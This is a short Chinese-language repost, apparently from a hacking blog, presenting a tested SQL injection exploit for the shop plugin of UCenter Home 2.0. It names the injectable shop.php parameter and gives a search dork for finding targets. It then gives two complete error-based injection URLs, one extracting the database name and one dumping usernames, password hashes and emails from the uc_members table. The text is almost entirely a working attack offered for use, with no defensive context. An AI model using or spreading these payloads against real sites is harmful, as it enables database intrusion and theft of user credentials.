从zhenker的百度空间转转过来的,游侠刚测试了下,可以用!OK , Let’s Go !
UCenter Home 2.0 shop插件漏洞都叫做DZ 0DYAY了。真杯具。
注入页: shop.php
注入字段: (?)ac=view&shopid=
关键词: inurl:shop.php?ac=view&shopid=
应用:
获得数据库名称:
https://www.youxia.org/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
获得帐号密码:
https://www.youxia.org/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1